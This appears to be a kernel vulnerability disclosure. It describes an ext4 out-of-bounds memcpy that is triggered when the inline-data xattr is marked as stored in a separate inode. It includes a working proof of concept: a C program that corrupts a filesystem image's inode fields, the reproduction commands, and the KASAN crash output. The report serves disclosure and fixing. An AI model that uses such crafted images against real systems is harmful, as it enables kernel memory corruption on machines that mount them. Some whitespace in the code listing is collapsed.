ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".
Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.
When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.
ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.
Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:
memcpy(buffer,
(void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:
1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:
$ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
mke2fs 1.43.7 (16-Oct-2017)
Creating regular file testfs.img
Filesystem too small for a journal
Creating filesystem with 100 4k blocks and 64 inodes
Allocating group tables: done
Writing inode tables: done
Writing superblocks and filesystem accounting information: done
2. Create a 75-byte file in the new filesystem:
$ mkdir mount
$ sudo mount testfs.img mount
$ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
1+0 records in
1+0 records out
75 bytes copied, 0.000811554 s, 92.4 kB/s
$ sudo umount mount
3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
non-inline:
$ cat fixup.c
#include <stdint.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#define __le16 uint16_t
#define __le32 uint32_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u8 uint8_t
/* some definitions from kernel headers */
#define EXT4_NDIR_BLOCKS12
#define EXT4_IND_BLOCKEXT4_NDIR_BLOCKS
#define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1)
#define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1)
#define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1)
#define EXT4_XATTR_MAGIC0xEA020000
struct ext4_inode {
__le16i_mode;
__le16i_uid;
__le32i_size_lo;
__le32i_atime;
__le32i_ctime;
__le32i_mtime;
__le32i_dtime;
__le16i_gid;
__le16i_links_count;
__le32i_blocks_lo;
__le32i_flags;
union {
struct {
__le32l_i_version;
} linux1;
} osd1;
__le32i_block[EXT4_N_BLOCKS];
__le32i_generation;
__le32i_file_acl_lo;
__le32i_size_high;
__le32i_obso_faddr;
union {
struct {
__le16l_i_blocks_high;
__le16l_i_file_acl_high;
__le16l_i_uid_high;
__le16l_i_gid_high;
__le16l_i_checksum_lo;
__le16l_i_reserved;
} linux2;
} osd2;
__le16i_extra_isize;
__le16i_checksum_hi;
__le32i_ctime_extra;
__le32i_mtime_extra;
__le32i_atime_extra;
__le32i_crtime;
__le32i_crtime_extra;
__le32i_version_hi;
__le32i_projid;
};
struct ext4_xattr_ibody_header {
__le32h_magic;
};
struct ext4_xattr_entry {
__u8e_name_len;
__u8e_name_index;
__le16e_value_offs;
__le32e_value_inum;
__le32e_value_size;
__le32e_hash;
chare_name[0];
};
#define INODE_SIZE 256
#define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )
int main(int argc, char **argv) {
char *path = argv[1];
int fd = open(path, O_RDWR);
if (fd == -1) err(1, "open");
struct stat st;
if (fstat(fd, &st)) err(1, "fstat");
char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) err(1, "mmap");
for (int i=0; i<st.st_size/INODE_SIZE; i++) {
struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
printf("found inode (idx=%d, size=%u, mode=%ho)\n",
i, ino->i_size_lo, ino->i_mode);
ino->i_size_lo = 60000;
printf("i_extra_isize = %hu\n", ino->i_extra_isize);
struct ext4_xattr_ibody_header *hdr =
(void*)( ((char*)ino)+128+ino->i_extra_isize );
if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
struct ext4_xattr_entry *entry = (void*)(hdr+1);
while (*(uint32_t*)entry != 0) {
printf("attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
entry->e_name_index, entry->e_name_len, entry->e_name,
entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
entry->e_value_offs = 0;
entry->e_value_inum = 20;
entry->e_value_size = 60000;
entry = (void*)(
(char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
);
}
}
}
$ gcc -o fixup fixup.c -Wall
$ ./fixup testfs.img
found inode (idx=555, size=75, mode=100644)
i_extra_isize = 32
attr: idx=7 name='data' offs=76 inum=0 size=15
4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):
$ fsck.ext4 -f testfs.img
e2fsck 1.43.7 (16-Oct-2017)
Pass 1: Checking inodes, blocks, and sizes
Inode 12 has INLINE_DATA_FL flag but extended attribute not found.Truncate<y>? no
Extended attribute in inode 12 has a value size (60000) which is invalid
Clear<y>? no
Inode 12 passes checks, but checksum does not match inode.Fix<y>? yes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Checking reference counts
Pass 5: Checking group summary information
testfs.img: ***** FILE SYSTEM WAS MODIFIED *****
testfs.img: ********** WARNING: Filesystem still has errors **********
testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks
5. Mount the filesystem again:
$ sudo mount testfs.img mount
6. Read the file:
$ hexdump -C mount/testfile
0000000000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................|
*
0000003000 00 00 00 00 00 00 0000 00 00 00 04 07 00 00|................|
0000004014 00 00 00 60 ea 00 0000 00 00 00 64 61 74 61|....`.......data|
0000005000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................|
*
000004a031 00 00 00 00 00 00 00e0 d1 fc 98 d7 7f 00 00|1...............|
000004b0e0 07 03 99 d7 7f 00 0000 00 00 00 00 00 00 00|................|
000004c000 00 00 00 00 00 00 00e0 5f 00 00 00 00 00 00|........._......|
000004d064 00 00 00 00 00 00 00f0 af 02 99 d7 7f 00 00|d...............|
000004e000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................|
[...]
7. Check dmesg:
$ dmesg
[...]
[ 3211.552729] ==================================================================
[ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922
[ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
[ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
[ 3211.552799] Call Trace:
[ 3211.552807]dump_stack+0x71/0xab
[ 3211.552813]print_address_description+0x6a/0x250
[ 3211.552817]kasan_report+0x258/0x380
[ 3211.552863]? ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552867]memcpy+0x34/0x50
[ 3211.552914]ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552961]ext4_read_inline_page+0x1e4/0x2a0 [ext4]
[ 3211.553006]? ext4_read_inline_data+0x120/0x120 [ext4]
[ 3211.553053]ext4_readpage_inline+0x13e/0x160 [ext4]
[ 3211.553101]ext4_readpage+0xf5/0x110 [ext4]
[ 3211.553106]generic_file_read_iter+0x9a4/0xea0
[ 3211.553112]? filemap_range_has_page+0x160/0x160
[ 3211.553116]? save_stack+0x89/0xb0
[ 3211.553120]? __kasan_slab_free+0x105/0x150
[ 3211.553124]? aa_path_link+0x1f0/0x1f0
[ 3211.553128]? do_syscall_64+0x150/0x160
[ 3211.553132]? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553137]? audit_watch_compare+0x1b/0x50
[ 3211.553142]__vfs_read+0x239/0x340
[ 3211.553145]? __x64_sys_copy_file_range+0x2d0/0x2d0
[ 3211.553149]? dput.part.19+0x2e/0x1b0
[ 3211.553154]? auditd_test_task+0x43/0x60
[ 3211.553158]vfs_read+0xa5/0x190
[ 3211.553162]ksys_read+0xa1/0x120
[ 3211.553166]? kernel_write+0xa0/0xa0
[ 3211.553171]do_syscall_64+0x6d/0x160
[ 3211.553175]entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553178] RIP: 0033:0x7f9ada1af72c
[ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
[...]
[ 3211.553197] The buggy address belongs to the page:
[ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
[ 3211.553207] flags: 0x17fffc000000021(locked|lru)
[ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
[ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
[ 3211.553222] page dumped because: kasan: bad access detected
[ 3211.553224] page->mem_cgroup:ffff8803cf31cac0
[ 3211.553229] Memory state around the buggy address:
[ 3211.553234]ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553238]ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553246]^
[ 3211.553250]ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553254]ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553257] ==================================================================